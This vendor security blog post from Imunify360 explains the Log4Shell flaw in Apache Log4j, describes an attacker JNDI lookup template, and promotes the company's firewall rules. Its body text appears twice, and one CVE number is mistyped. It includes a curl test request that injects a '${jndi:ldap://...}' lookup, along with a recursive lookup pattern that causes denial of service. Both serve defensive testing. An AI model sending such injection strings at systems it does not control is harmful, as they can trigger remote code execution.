<iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5HLVVHN" height="0" width="0" style="display:none;visibility:hidden">

Log4j vulnerability in the masses

Log4j vulnerability in the masses

A serious new vulnerability was identified in the popular Java logging library log4j v2. It received  ID CVE-2021-44228 - Apache Log4j2 Remote Code Execution. CVSS score 10.0.

Imunify360 WAF provides protection from this vulnerability in the version of the rules v4.31 released 13/12/2021. In the Imunify360 WAF rules, v4.32 (13/12/2021) has added rules for WAF anti-evasion techniques. 

Web servers behind our WAF are protected from this attack when exploited over the web. Since this vulnerability can be exploited not only via the web, we strongly recommend that you update Apache log4j to version 2.17.0 or later.

 

Log4Shell vulnerability incidents registered in the wild:

log4shell vulnerability incidents

We registered more than 2,2 millions incidents with log4j since 13/12/2021.

 

Log4j Vulnerability details

The default configuration of Apache Log4j supports JNDI (Java Naming and Directory Interface) lookups that can execute arbitrary code provided by remote services such as LDAP, RMI, and DNS.

Attack string template:

log4j attack string template

where

${ - The open tag for the log4j 

jndi: - Specifying to log4j to use the JNDI Manager to resolve the message

ldap:// - JNDI request will be resolved using the LDAP protocol

attacker_website - is an attacker-controlled server

payload - The path to send to the server with the request

 

This will add the string to the web server’s log. When the Log4j application parses these logs and finds a string, it makes a request to the URL listed in the JNDI string. Base64-encoded commands in this URL could be executed on a vulnerable device.

We see and successfully reject a lot of attack attempts like this one:log4j attempts

To test if your server is vulnerable or not you can send the following test request:

curl 'http://your_protected_site/$\{jndi:ldap://127.0.0.1/c'

 

You should get response status “403 Forbidden“ in case of successful attack prevention.

The log4j developers released version 2.15.0 to address CVE-2021-4422, but another attack vector was reported after that - CVE-2021-45046 (JNDI Lookup pattern resulting in a denial of service (DOS) attack). DOS attack is possible using an infinite loop created by recursive resolving ${ctx:apiversion}

Imunify360 WAF also protects Web Servers against CVE-2021-45046. 

 

Imunify360 is a complete security suite with all components working together to keep your servers safe and running while you could focus on other business tasks. Imunify360 is a synergy of Antivirus for Linux Server, Firewall, WAF, PHP Security Layer, Patch Management, Domain Reputation with easy UI and advanced automation. Try Imunify360 free for 14 days and see results in just one week.

Make your servers secure now!

Log4j vulnerability in the masses

Log4j vulnerability in the masses

A serious new vulnerability was identified in the popular Java logging library log4j v2. It received  ID CVE-2021-44228 - Apache Log4j2 Remote Code Execution. CVSS score 10.0.

Imunify360 WAF provides protection from this vulnerability in the version of the rules v4.31 released 13/12/2021. In the Imunify360 WAF rules, v4.32 (13/12/2021) has added rules for WAF anti-evasion techniques. 

Web servers behind our WAF are protected from this attack when exploited over the web. Since this vulnerability can be exploited not only via the web, we strongly recommend that you update Apache log4j to version 2.17.0 or later.

 

Log4Shell vulnerability incidents registered in the wild:

log4shell vulnerability incidents

We registered more than 2,2 millions incidents with log4j since 13/12/2021.

 

Log4j Vulnerability details

The default configuration of Apache Log4j supports JNDI (Java Naming and Directory Interface) lookups that can execute arbitrary code provided by remote services such as LDAP, RMI, and DNS.

Attack string template:

log4j attack string template

where

${ - The open tag for the log4j 

jndi: - Specifying to log4j to use the JNDI Manager to resolve the message

ldap:// - JNDI request will be resolved using the LDAP protocol

attacker_website - is an attacker-controlled server

payload - The path to send to the server with the request

 

This will add the string to the web server’s log. When the Log4j application parses these logs and finds a string, it makes a request to the URL listed in the JNDI string. Base64-encoded commands in this URL could be executed on a vulnerable device.

We see and successfully reject a lot of attack attempts like this one:log4j attempts

To test if your server is vulnerable or not you can send the following test request:

curl 'http://your_protected_site/$\{jndi:ldap://127.0.0.1/c'

 

You should get response status “403 Forbidden“ in case of successful attack prevention.

The log4j developers released version 2.15.0 to address CVE-2021-4422, but another attack vector was reported after that - CVE-2021-45046 (JNDI Lookup pattern resulting in a denial of service (DOS) attack). DOS attack is possible using an infinite loop created by recursive resolving ${ctx:apiversion}

Imunify360 WAF also protects Web Servers against CVE-2021-45046. 

 

Imunify360 is a complete security suite with all components working together to keep your servers safe and running while you could focus on other business tasks. Imunify360 is a synergy of Antivirus for Linux Server, Firewall, WAF, PHP Security Layer, Patch Management, Domain Reputation with easy UI and advanced automation. Try Imunify360 free for 14 days and see results in just one week.

Make your servers secure now!

Subscribe to Imunify security Newsletter